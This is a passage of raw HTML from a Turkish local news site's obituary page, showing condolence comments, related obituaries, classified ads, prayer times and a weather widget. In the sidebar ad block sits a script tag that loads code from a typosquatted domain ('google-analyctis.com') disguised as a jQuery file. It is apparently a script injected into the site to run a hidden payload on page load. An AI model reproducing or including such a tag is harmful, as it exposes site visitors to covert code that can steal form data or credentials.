id="wh_comdislike270841">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_270842"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Fatih Görür</b> <small class="time">2 saat önce</small> <p class="text">Cenab-ı Hak Rahmet eylesin. Mekanı cennet olsun. Kerim ve Şaban hocam nezdinde tüm yakınlarına başsağlığı ve metanet temenni ediyorum.Ruhu şad mekanı cennet olsun. İnşAllah</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Fatih Görür" id="270842"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like270842" onclick="like(270842,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike270842">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike270842" onclick="like(270842,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike270842">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_270843"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>HÜSEYİN ÖNAT</b> <small class="time">2 saat önce</small> <p class="text">Rabbim rahmeti ile muamele etsin inşAllah. Nur içinde yatsın. Sevdiklerine sabırlar diliyorum. başınız sağolsun.</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@HÜSEYİN ÖNAT" id="270843"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like270843" onclick="like(270843,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike270843">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike270843" onclick="like(270843,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike270843">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_270844"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Sait Anteplioğlu</b> <small class="time">2 saat önce</small> <p class="text">Allah rahmet eylesin mekanı cennet olsun</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Sait Anteplioğlu" id="270844"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like270844" onclick="like(270844,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike270844">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike270844" onclick="like(270844,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike270844">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_270845"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Mehmet altuntop</b> <small class="time">2 saat önce</small> <p class="text">ALLAH rahmet eylesin mekanı cennet olsun inşAllah</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Mehmet altuntop" id="270845"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like270845" onclick="like(270845,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike270845">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike270845" onclick="like(270845,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike270845">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_270847"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Bahittin Saykın ALMANYA</b> <small class="time">2 saat önce</small> <p class="text">Merhuma Allah’tan rahmet, yakınlarına başsağlığı dilerim. Mekanı cennet olsun.</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Bahittin Saykın ALMANYA" id="270847"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like270847" onclick="like(270847,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike270847">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike270847" onclick="like(270847,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike270847">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_270860"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Ali Gözükara</b> <small class="time">1 saat önce</small> <p class="text">ALLAH cc RAHMET EYLESİN MEKANI CENNET OLSUN</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Ali Gözükara" id="270860"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like270860" onclick="like(270860,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike270860">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike270860" onclick="like(270860,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike270860">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> </div> <!-- #comment_list --> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/zuleyha-unsal-53-yasinda-h64418.html" title="Züleyha Ünsal 53 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/zuleyha_unsal_53_yasinda_h64418_bf1a3.jpg" alt="Züleyha Ünsal 53 yaşında" /> <span>Züleyha Ünsal 53 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/salih-bildirici-86-yasinda-h64407.html" title="Salih Bildirici 86 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/salih_bildirici_86_yasinda_h64407_8e17d.jpg" alt="Salih Bildirici 86 yaşında" /> <span>Salih Bildirici 86 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/durdu-mehmet-temizsoy-81-yasinda-h64406.html" title="Durdu Mehmet Temizsoy 81 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/durdu_mehmet_temizsoy_81_yasinda_h64406_a06f5.jpg" alt="Durdu Mehmet Temizsoy 81 yaşında" /> <span>Durdu Mehmet Temizsoy 81 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-safak-71-yasinda-h64405.html" title="Mehmet Şafak 71 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/mehmet_safak_71_yasinda_h64405_f03c9.jpg" alt="Mehmet Şafak 71 yaşında" /> <span>Mehmet Şafak 71 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/esra-sarikaya-bebek-h64404.html" title="Esra Sarıkaya (Bebek)"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/esra_sarikaya_h64404_882bf.jpg" alt="Esra Sarıkaya (Bebek)" /> <span>Esra Sarıkaya (Bebek)</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-h64393.html" title="VEFAT TEŞEKKÜR"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/vefat_tesekkur_h64393_25410.jpg" alt="VEFAT TEŞEKKÜR" /> <span>VEFAT TEŞEKKÜR</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-h64392.html" title="VEFAT TEŞEKKÜR"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/vefat_tesekkur_h64392_a664a.jpg" alt="VEFAT TEŞEKKÜR" /> <span>VEFAT TEŞEKKÜR</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-senturk-h64386.html" title="Mehmet Şentürk"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/mehmet_senturk_h64386_593a6.jpg" alt="Mehmet Şentürk" /> <span>Mehmet Şentürk</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-esyali-veya-esyasiz-kaloriferli-kiralik-11623.html" title="SAHİBİNDEN EŞYALI VEYA EŞYASIZ KALORİFERLİ KİRALIK" >SAHİBİNDEN EŞYALI VEYA EŞYASIZ KALORİFERLİ KİRALIK</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-esyali-veya-esyasiz-kaloriferli-kiralik-11623.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SAHİBİNDEN EŞYALI VEYA EŞYASIZ KALORİFERLİ KİRALIK" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11613.html" title="Kiralık daire" >Kiralık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11613.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11612.html" title="Kiralık daire" >Kiralık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11612.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sobali-kiralik-daire-11607.html" title="SOBALI KİRALIK DAİRE" >SOBALI KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sobali-kiralik-daire-11607.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SOBALI KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/esyali-kiralik-ev-11606.html" title="EŞYALI KİRALIK EV" >EŞYALI KİRALIK EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/esyali-kiralik-ev-11606.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="EŞYALI KİRALIK EV" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-kisla-caddesi-11604.html" title="Satılık daire kışla caddesi" >Satılık daire kışla caddesi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-kisla-caddesi-11604.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/f38a53300c7688e06aa14604273c08ed51c98624.jpg" alt="Satılık daire kışla caddesi" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahintepesinde-kiralik-41-ultra-luks-daire-11598.html" title="Şahintepesinde kiralık 4+1 ultra lüks daire" >Şahintepesinde kiralık 4+1 ultra lüks daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahintepesinde-kiralik-41-ultra-luks-daire-11598.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Şahintepesinde kiralık 4+1 ultra lüks daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mahallesi-11595.html" title="yeşilyurt mahallesi" >yeşilyurt mahallesi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mahallesi-11595.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="yeşilyurt mahallesi" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/saraykentte-kaloriferli-kiralik-daire-11591.html" title="saraykentte kaloriferli kiralık daire" >saraykentte kaloriferli kiralık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/saraykentte-kaloriferli-kiralik-daire-11591.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="saraykentte kaloriferli kiralık daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/elkrik-ustasi-kalfa-11590.html" title="Elkrik ustasi-kalfa" >Elkrik ustasi-kalfa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/elkrik-ustasi-kalfa-11590.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Elkrik ustasi-kalfa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/is-ariyorum-11588.html" title="İş Arıyorum" >İş Arıyorum</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/is-ariyorum-11588.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İş Arıyorum" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-sobali-daire-11586.html" title="Kiralık sobalı daire" >Kiralık sobalı daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-sobali-daire-11586.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık sobalı daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/21-sahin-tepesi-11585.html" title="2+1 şahin tepesi" >2+1 şahin tepesi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/21-sahin-tepesi-11585.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="2+1 şahin tepesi" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/gol-vadisi-2-konutlari-kiralik-41-11584.html" title="GÖL VADİSİ 2 KONUTLARI KİRALIK 4+1" >GÖL VADİSİ 2 KONUTLARI KİRALIK 4+1</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/gol-vadisi-2-konutlari-kiralik-41-11584.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/6b7209bb5cce74d5526eab116280c93d02ff71f8.jpg" alt="GÖL VADİSİ 2 KONUTLARI KİRALIK 4+1" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yasli-bakimi-hasta-bakimi-11582.html" title="Yaşlı bakımı hasta bakımı" >Yaşlı bakımı hasta bakımı</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yasli-bakimi-hasta-bakimi-11582.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Yaşlı bakımı hasta bakımı" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/silahli-saldirilar-pes-pese-geldi-4-zanlidan-3-u-yakalandi-h64384.html" title="Silahlı saldırılar peş peşe geldi;..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/elbistanda_silahli_saldiri_h64384_ea1e1.jpg" alt="Silahlı saldırılar peş peşe geldi;..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/silahli-saldirilar-pes-pese-geldi-4-zanlidan-3-u-yakalandi-h64384.html" title="" ><span class="en-hit">1.</span> <strong>Silahlı saldırılar peş peşe geldi;...</strong> <span class="en-spot en-hidden">Elbistan ve Göksun ilçelerinde aynı kişilerce peş peşe gerçekleştirildiği...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistan-semalarinda-gun-boyu-ucan-ucagin-sirri-cozuldu-h64416.html" title="Elbistan semalarında gün boyu uçan..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/elbistan_semalarinda_gun_boyu_ucan_ucagin_sirri_cozuldu_h64416_a8d21.jpg" alt="Elbistan semalarında gün boyu uçan..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistan-semalarinda-gun-boyu-ucan-ucagin-sirri-cozuldu-h64416.html" title="" ><span class="en-hit">2.</span> <strong>Elbistan semalarında gün boyu uçan...</strong> <span class="en-spot en-hidden">Elbistan semalarında gün boyunca alçaktan uçan ve vatandaşların...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/dr-ahmet-atakan-akat-h64264.html" title="Dr. Ahmet Atakan Akat" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/dr_ahmet_atakan_akat_h64264_e95a4.jpg" alt="Dr. Ahmet Atakan Akat" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/dr-ahmet-atakan-akat-h64264.html" title="" ><span class="en-hit">3.</span> <strong>Dr. Ahmet Atakan Akat</strong> <span class="en-spot en-hidden">Dr. Ahmet Atakan Akat</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ugur-kurt-h64308.html" title="Uğur Kurt" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/ugur_kurt_h64308_930c7.jpg" alt="Uğur Kurt" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ugur-kurt-h64308.html" title="" ><span class="en-hit">4.</span> <strong>Uğur Kurt</strong> <span class="en-spot en-hidden">Uğur Kurt</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/davanin-ilk-durusmasi-goruldu-h64154.html" title="Davanın ilk duruşması görüldü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/davanin_ilk_durusmasi_goruldu_h64154_19d1a.jpg" alt="Davanın ilk duruşması görüldü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/davanin-ilk-durusmasi-goruldu-h64154.html" title="" ><span class="en-hit">5.</span> <strong>Davanın ilk duruşması görüldü</strong> <span class="en-spot en-hidden">AK Parti Elbistan Kadın Kolları Başkanı Dilek Çevik’in, tehdit...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/dr-ahmet-atakan-akat-h64264.html" title="Dr. Ahmet Atakan Akat" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/dr_ahmet_atakan_akat_h64264_e95a4.jpg" alt="Dr. Ahmet Atakan Akat"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/dr-ahmet-atakan-akat-h64264.html" title="" ><span class="en-hit">1.</span> <strong>Dr. Ahmet Atakan Akat</strong> <span class="en-spot en-hidden">Dr. Ahmet Atakan Akat</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hilmi-bildirir-66-yasinda-h64248.html" title="Hilmi Bildirir 66 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/hilmi_bildirir_66_yasinda_h64248_640d7.jpg" alt="Hilmi Bildirir 66 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hilmi-bildirir-66-yasinda-h64248.html" title="" ><span class="en-hit">2.</span> <strong>Hilmi Bildirir 66 yaşında,</strong> <span class="en-spot en-hidden">Hilmi Bildirir 66 yaşında,</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-safak-71-yasinda-h64405.html" title="Mehmet Şafak 71 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/mehmet_safak_71_yasinda_h64405_f03c9.jpg" alt="Mehmet Şafak 71 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-safak-71-yasinda-h64405.html" title="" ><span class="en-hit">3.</span> 